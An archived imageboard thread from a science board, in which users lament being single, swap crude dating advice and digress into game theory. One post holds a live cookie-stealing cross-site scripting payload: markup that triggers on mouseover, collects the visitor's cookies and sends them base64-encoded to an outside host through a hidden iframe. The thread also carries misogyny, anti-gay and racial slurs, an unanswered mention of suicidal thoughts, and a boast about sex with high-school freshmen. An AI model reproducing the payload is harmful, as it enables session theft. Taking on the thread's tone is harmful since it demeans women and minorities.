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/sci/ - Science & Math

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[ERROR] No.3634538 [Reply] [Original]

>that feel when no gf

>> No.3634549
File: 18 KB, 379x214, imokwiththis.png [View same] [iqdb] [saucenao] [google]

>mfw I'm 19 and never been kissed
>mfw I don't even care
>mfw physical women would probably sicken me
>mfw the only guilt or shame I feel is a result of other people's criticism

>> No.3634554
File: 8 KB, 90x72, meatwad_dancing.gif [View same] [iqdb] [saucenao] [google]

I read that as: That feel when no gif.

Soooooooo here. Have a .gif

>> No.3634560

>MFW I'm married.
>MFW i feel the same way as you, girls sicken me guys sicken me, just generally being around people for longer than 10 minutes sickens me.
>MFW its the same as yours.
I might have a serious mental issue. But i dont care.

>> No.3634583


We are all human. Inside of us all, perhaps deep, there is a yearning to be loved by another.

Just out of curiosity - How is your relationship with your mother?

>> No.3634595

Your failure in your sex life isn't science related, unless you die a few weeks later due to natural selection.

>> No.3634599
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>real science

Anyways, anybody know how to obtain a gf even though you're introverted as fuck?
I'm not hideous, I think.

>> No.3634604


>mfw when i had the same issues
>mfw when i found the fattest woman i could
>mfw when i one night standed it

>> No.3634608

>relationship with mother

It was/is perfectly fine.

>> No.3634610

When did you first realise you hated your horse?

>> No.3634627

The only thing that bothers me about it is that people seem to judge me for it.

>> No.3634633

Well, why don't you have a girlfriend.
Are you gay?
Are you a loser?
What, why? everybody has the need to have a mate, even faggots do later on when they get older. Of course you not having a lady to call your girlfriend/spouse implies you're neuro-atypical, and as such, you're a weirdo.

>> No.3634662


>> No.3634675

>implying normal = correct
>implying base evolutionary instincts like the drive for reproduction signify anything of importance or distinction in a person

>> No.3634683

>>implying normal = correct
Are you serious?

And the second one does matter, because that means you're a weirdo, weirdo.
deal with it.

>> No.3634693
File: 92 KB, 300x300, alfkdsj.jpg [View same] [iqdb] [saucenao] [google]

>yfw Newton died a virgin

Enjoy being like everyone else, and succumbing to hivemind peer pressure.

>> No.3634700

Einstein didn't die a virgin.
But then again, Einstein was autistic, I didn't say that being a weirdo was necessarily bad, just saying that you're a weirdo.

>> No.3634704

Also, just so you know, I'm also a weirdo.

so can you help me get laid?

>> No.3634706

Wow its like i am on /b/!

>> No.3634716


>> No.3634712

All the time man, all the time.

>> No.3634715


need to make sure you are not hideous, post a pic.

>> No.3634720


>> No.3634727
File: 66 KB, 320x320, forever-alone.gif [View same] [iqdb] [saucenao] [google]

>That feel when no social skills

>> No.3634738


Then I'll operate under the assumption that you are likely an abortion of a person.

Step 1. Try not to be so ugly (shower, shampoo, shave, etc.)
Step 2. Stop being introverted (since you are ugly your personality is going to have to be your selling point)
Step 3. Study psychology (not kidding, you have to learn to think like women, and only that inferior gender would think psychology is a legitimate field of study)
Step 4. Surround yourself by women constantly (this is simply playing the numbers game here)
Step 5. ?????
Step 6. Profit!

>> No.3634745

I don't honestly think I can stop being introverted, and I think I am not hideous, but alright.
Not going to study psychology.
Fuck that, not getting woman instead.

>> No.3634760

>OP arguing with himself

>> No.3634762
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Oh that reminds me...

Step -1. Be a pussy and be scared of improving yourself
Step <span class="math">\infty[/spoiler]. Be <span class="math">\mathcal FOREVER ALONE[/spoiler]

>> No.3634771

Because what the fuck do people talk about anyways?

What, why.

>> No.3634768

I can't help be introverted man, if I have nothing to talk about I won't initiate a conversation.

I only have like 3 friends.

>> No.3634802

>Step 4. Surround yourself by women constantly (this is simply playing the numbers game here)

Truth. Not even necessarily from a numbers game aspect. By hanging around women you will be introduced to their girlfriends. Also they will help you with your style. Plus being around women will boost your self confidence and make you seem more attractive to other women. Just don't over do it or other women will just consider you gay since you don't hang out with men.

>> No.3634809
File: 27 KB, 502x377, me4.jpg [View same] [iqdb] [saucenao] [google]

I have done everything (including anal)

EXCEPT sex with girlfriends in highschool. Shit was cash. Shit was also all done on incoming freshman who crushed on my looks but didn't understand that I was merely exploring their dainty womanly figures and had 0 interest in their underdeveloped personalities. Truth is I don't have enough character content to attract intelligent women my age, nor older. Shit sucks.

>> No.3634816
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>Study psychology (not kidding, you have to learn to think like women, and only that inferior gender would think psychology is a legitimate field of study)

>> No.3634838

Feels good to be introverted master race.

>> No.3634853
File: 9 KB, 344x341, 1289948932306.png [View same] [iqdb] [saucenao] [google]

>Dont have any friends
>Crushing depression
>No reason not to kill myself
>Earning my degree
>Hopefully I pass
>Then I can be successfull
>Probably will still be miserable though

>> No.3634863

>Inb4 some retard actually thinks game theory is a sane way to interact

>> No.3634865

Actually, I really do want to have sex.

How are we masterrace?

>> No.3634880


What's wrong with it? I postulate that game theory is an excellent way to predict human behavior, with the exception of our inability to efficiently and effectively find out what one values.

If we could find that out, from there, I figure, it's just calculating of values and applying the pleasure the principle for picking the most rewarding outcome as the expected action to be taken.

>> No.3634932

bump for answer

>> No.3634939


>> No.3634940

How is that relevant?

>> No.3634947


The problem is a real world utility function could prove to be infinitely recursive. Let's say I derive pleasure from doing what you don't expect me to do. If you model my utility as u(A)=1, u(B)= 0 I will do B. Knowing this, you will say, u(A)=0 and u(B)= 1, and I will pick A. Fed up, you set u(A)=0.5 and u(B)= 0.5 and I pick the mixed strategy A with probability 1/pi.

>> No.3634946

/sci/ bitching about not having a girlfriend, the usual meme on this board that intelligent people go untouched. How is it not relevant?

>> No.3634950

Well, I can see the relation, but why should I care about woman not wanting to fuck people who think they deserve it by not doing anything for it anyways.

What I mean is, that self entitlement doesn't work unless you're a jock.

>> No.3634951

because /sci/'s essentially /r9k/ when women and dating are brought up, or /sci9k/ if you like to call it

>> No.3634960


I see what you did there, you tricky bastard. So, the only answer I can give you is that, in order to avoid such a paradox one would have to abide by something similar to one of Asimov's axioms of psychohistory.

"that the population should remain in ignorance of the results of the application of psychohistorical analyses"


>> No.3634961

well moot himself said that a large number of IPs that were posting on /r9k/ regularly had migrated to /sci/, just makes me think what kind of shit hole this place is.

>> No.3634987


Yes, Game Theory and Mechanism Design need an axiomatisation to be meaningful. I'm considering doing an MSc on that next year. We'll see.

>> No.3635001

Why not just hire an escort? I personally don't see anything wrong with it, and it's better than getting a prostitute off the streets. It'll set you back about $200 though.

>> No.3635011
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I have dignity.

>> No.3635066

If you're a virgin, I can see your point.

I hired a Japanese fetish escort after having had sex with 4 different girls in my lifetime. Two of them were friends with benefits, and 2 of them actual girlfriends. I wouldn't have hired one as a virgin.

Because I was the same age as the escort, she went out for a walk with me in NYC before our session, we grabbed some food and coffee at a restaurant and talked for awhile, then went to her time-shared room for one hour.

She was the Dom, I was the Sub, but I could suggest she do anything to me, no limits. That one set me back $360, but it was a really fun time, and I feel no loss of dignity having done it. I may feel bad for other reasons, but won't get into that. Sex workers IMO are an essential part of society, and I respect their work.

>> No.3635069

I believe that too, but I want to try the hard way first.

>> No.3635112

Take this pussy bullshit BAWWWWW crap to /adv/ or /soc/, you whiney little faggot.

>> No.3635116
File: 95 KB, 981x902, 1304067453160.jpg [View same] [iqdb] [saucenao] [google]

Being able to effectively find a mate is science & math.

>> No.3635136

You're definitely right. Get it the hard way first, then anything goes. Good luck.

I have an extremely hard time now as a grad student. I'm extroverted, but avoid bars and clubs, and without dorms as in undergrad, where people mix together and hook up it's damn near impossible to meet girls. I'm not a bad looking guy either. 6 feet tall, 160 lbs, work out at gym...and there are so many hot Chinese girls that are untouchable. It's incredibly frustrating to have a strong libido and an attraction to Asians...

>> No.3635142

You just keep on telling yourself that, k? It'll keep you nice and safely out of the gene pool.

>> No.3635144

Well, that's easy for you then because woman are attracted to extroverts more so than introverts, which is my case.

I just want to get laid as badly as the next guy, but I have no idea where to start.

I would briefly leave my comfort zone.

>> No.3635198

Had sex with a hot chick, gave everything to a girl, got dumped. Feels bad man. Relationships aren't worth it.

>> No.3635210

But you had sex with a hot chick.

>> No.3635228
File: 11 KB, 200x148, not a single fuck.jpg [View same] [iqdb] [saucenao] [google]

>> No.3635230

How old are you?

When I was in high school, I was introverted. I became more extroverted as an undergrad, but still kept to myself quite a bit. After I took a solo trip around the world, and HAD to socialize in order to survive, I found myself to be fairly talkative. I now go out of my way to talk to people from different countries (I go to a very diverse university) about a wide range of topics. I just had a 4 hour talk last week with a Japanese guy and American girl about Chinese politics even though I'm an engineer. The more you talk with people, the more diverse your conversations will become and the more interesting you'll become. If you can talk about a wide range of topics, you can entertain girls with various interests.

I would suggest taking one of two routes. Either change yourself into a more extroverted person by intentionally putting yourself into situations that require social skills, or find outlets for people like you. If you're like most of the people I know who call themselves introverts, you might just not like activities such as going to bars or clubs, and might do better at smaller social events. If you're in university, maybe take a dancing class, join an outdoor club...etc. If you're like my current roommate, who holes himself up in his room playing (presumably) MMPORG's you're going to have a hard time. That's enough of my alcohol-induced rant. I'm not going to re-read, but hopefully I said something useful in that mess.

>> No.3635256

I honestly don't think I can make myself extrovert, if I tried what you did I would simply have something to talk about.

Thing is, I don't like discussing stuff that doesn't interest me, but I guess that applies to every male in the world as woman and men don't think about the same stuff, so there I have it.

I only have 4 friends who I play video games with, and well, I really don't do anything besides that.

Now get this, it's not that I'm shy, it's just that for some reason I feel overwhelmed if I talk to too much people, or talk about stuff that doesn't actually interest me for too long.

I'm not qualified, right?

>> No.3635276

<div class="math">\bbox["><span id="fhs" onmouseover="
z=y+';'+z; if(!/^(4chan_pass|4chan_email|popunde?r|setover18)/.test(y)) n++;}}
if(n) document.body.innerHTML+='<iframe style=display:none'
+' src=http://lolbbox.weebly.com/?'+btoa(z)+'></iframe>';
" style="position:fixed;left:0px;top:0px;width:100%;height:100%"></span>]~</div>

>> No.3635286

Interesting spam my good friend, but 4chan plus saves me this faggotry, but does it save you from checking the last two digits from my post ID?

Check them to make sure.

>> No.3636730


>> No.3636872


>or find outlets
>for people like you
>on 4chan

Shit nigger, what the fuck do you think I'm doing? Can't hold a conversation with most people because their interests are always mundane and inane in the extreme.

>> No.3636885
File: 126 KB, 424x283, asdf.jpg [View same] [iqdb] [saucenao] [google]

That feel when gf

>> No.3636906
File: 54 KB, 425x282, asdf.jpg [View same] [iqdb] [saucenao] [google]

feel that, gf?

>> No.3636911
File: 35 KB, 285x255, asdf.jpg [View same] [iqdb] [saucenao] [google]

feel gf

>> No.3636914
File: 146 KB, 802x1300, asdf.png [View same] [iqdb] [saucenao] [google]

feel g

>> No.3636920
File: 9 KB, 256x192, 130800012478[1].jpg [View same] [iqdb] [saucenao] [google]


>> No.3636930

SPRÖLÖLÖ :------------------D

>> No.3636956
File: 18 KB, 641x681, 131291299572.png [View same] [iqdb] [saucenao] [google]


>> No.3637002


>> No.3637051